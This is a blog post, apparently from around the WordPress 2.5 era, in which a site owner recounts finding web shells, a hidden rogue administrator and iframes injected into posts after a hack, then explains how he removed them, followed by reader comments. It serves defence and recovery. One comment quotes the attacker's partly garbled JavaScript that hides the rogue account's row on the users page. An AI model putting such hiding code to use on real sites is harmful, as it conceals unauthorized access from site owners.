How To Tell If You Have a Hacked WordPress Blog + Fix

WPHeadSo I know you have all heard about older WordPress installations being hacked recently. If you have not already updated your blog to the latest and greatest WordPress version take the time to do it now.

Do not be foolish and put it off like I did!  That’s right boys and girls, my very own Ask The Admin was hacked and it was a very slick method I might add.

I will show you how I figured out that I was hacked and how I fixed it.

First off I was notified that AskTheAdmin.com’s account was suspended for a malicious script living in a directory on my hosted server. My hosting company told me that two malicious scripts were found on my server which were:

http://asktheadmin.com/wp-includes/images/Luxury/pss.php
http://asktheadmin.com/_vti_doc/pss.php

I knew at this point I had a hacked WordPress blog. And I had just read about the exploits of older WordPress versions. I thought I was going to be seeing changed permalinks but they did not do that to me at all. They found another way to get me!


I immediately logged into my account via ftp and deleted the scripts. Then I logged into WordPress and took a look at the users module.

hacked wordpress blog

What the hell? All of a sudden, instead of 2 administrators, I now had 3. And for some fricking reason the only two administrators that were showing up on my control panel were all legit. So they not only added a administrator to my WordPress installation but they also managed to hide it from unsuspecting eyes.

So now I did a little Google Fu (like kung fu but not as martial artsy). I discovered that the user names would still be on the page but hidden. So I did a right click on the page and clicked on View Source:

wp2

Once I viewed the page source I searched the text for my other administrator’s name ““ Michael. Then I thought it would be better to search for the word Adminstrator – This brought me to the correct section in the html code. I now see the culprit:

fix hacked wordpress blog

So that brought me to first my account, then Michael’s account and finally the LewisLawson63 account. This was added without my knowledge and hidden from my eyes by a script that hacked my WordPress blog. Damn hackers!! But on the same line as the self proclaimed administrator is their account’s edit link. This is what you need to hit.

wp4

All I did was paste the link from the HTML source code after my wp-admin/ in my address bar. So it would say http://www.asktheadmin.com/wp-admin and then another / and the link. This will take you right to the users edit page:

how to fix hacked wordpress blog

Do you see where First name is? Well that script was like 10 lines long in there”¦ Being all exploitive. I removed that code and replaced it with a new username for them. Next I made their role a subscriber.

wp6

Now guess what they show up in my list and I can delete them! Next let’s turn off allowing users to allow themselves to be registered under settings in your WP control panel like so:

wp8

I then went and grabbed backups of my website. (Well actually I ran MySQL queries to see what else had been altered and I looked for inserted iFrames into my posts) It turns out they touched EVERY SINGLE POST! Damn Damn Damn! I am so glad I have daily backups.

I restored my site from 3 days ago (when it happened) I lost a few posts but the damage was gone. If you are not as lucky to have a backup your content is all suspect! They might be showing your readers ads or worse! So be weary and don’t take any more chances! Next time you see this:

wp7

Listen and update!

Do you have a WordPress horror story to share with us? Another removal or detection method? Share them with us in the comments!

Tagged:

Karl L. Gechlik

Karl L. Gechlik here from AskTheAdmin.com doing a weekly guest blogging spot for our new found friends at MakeUseOf.com. I run my own consulting company, manage AskTheAdmin.com and work a full 9 to 5 job on Wall street as a System Administrator.

Similar Stuff

The comments were closed because the article is more than 90 days old.

If you have any questions related to stuff mentioned in the article or need help with any computer issue, just ask it on MakeUseOf Answers.

  • http://www.myhtmlworld.com Sunil

    I also faced similar situation. blogged it here.. http://www.myhtmlworld.com/personal/iframe-attack-on-websites.html

  • http://www.jackcola.org Jack Cola

    One of my wordpress blogs have also been hacked. I only had one administrator, now I have 2. If you have a slow internet connection, you may be able to see the other hidden administrator name quickly appear, then disappear. Keep refreshing the page and click on the stop button and it should stay there for a while (slower the internet connection, the better)

    I hoped this also helps some people.

  • http://www.dazzlindonna.com Donna

    I released a script a while back that monitors the files on your server for any changes (adds/edits/deletes). Within an hour of those two files being added to your server, you would have known it because you would have received emails about them. It doesn’t prevent hacking, but it helps you to find out about it much sooner than waiting for your host to smack you around. :) You can grab it here – http://www.webchicklet.com/tools/monitorhackdfiles-tool-helps-fight-site-hackers/

  • http://farmbox.com RobtWms

    You know, maybe I’m just anal about security, but I *never* delay wordpress (or any other web facing software) updates. Rarely takes me more than 24 hours to update the software on 4 websites. Truly, an ounce of prevention is better than a pound of cure.

  • http://www.money4invest.com Lee | Money4Invest.Com

    I never know that hackers are so clever to hide the script in the wordpress. I wondered how they hacked into the wordpress account, is it through the admin password or other way? Anyway, I had upgraded all the version to the latest one to prevent the similar unwanted incident happens to me. Thanks for the info sharing.

  • http://www.themepremium.com Harsh Agrawal

    Damn man this is scary. I have a friend whose website got hacked yesterday he removed the script though he might need to check the iframes in every post..

  • http://mattdunlap.org Matt Dunlap

    So that is what they did in this latest hack? that’s old school… surprised WP didn’t have that fixed a long time ago

  • Edoardo

    hello, with your interesting post I also discovered I have a administrator in more on my website. I followed your procedure to read her name and delete it.
    While you “First name” was written the script, in my case there were only 3 dots.
    I followed your procedure for cancellation, but I’m afraid that there have been changes. Perhaps was it not entered any script? What do you think? Thank you.

    • Chris Rowe

      I have had a hidden user for a long time and did not thing much about it. I seems they have not been doing much if anything that I can find.

      My hidden user also shows up as “…’ (3 dots) but if you select all and past into a text editor you can see the entire entry. I is on multiple lines.


      ... var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i 0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } }catch(e){}; }; addLoadEvent(setUserName);

  • http://pochp.wordpress.com poch

    Best tip for WP I had so far!

  • http://tech-mania.com Sid

    Awesome fix there now i must make my blog secure…i had got a attack on one of the theme files when unknowingly i had antivirus and wp- security plugin it scanned and made me know where i was wrong..

  • http://www.csajamaica.com Chris

    The hackers need to find better things to do with their talents.

  • Jason

    Chris “The hackers need to find better things to do with their talents.”

    Some do. I have hacked into things but I then show the user how to make it more secure. I have never hacked into something without their consent though.

  • http://alfred.co.in/ Alfred

    sad to hear this, hope the very best for the future

  • http://www.privacylover.com Frank

    This is a very useful post, the best way to protect oneself is to learn about what happened to other people and how it happened.

    It would have been useful to know what WordPress version was the one hacked so that others running it know that it has some vulnerability.

    And while software updating is a must, surely everyone is entitled to internet holidays at some point…

    • http://www.asktheadmin.com Karl Gechlik

      I was running 2.5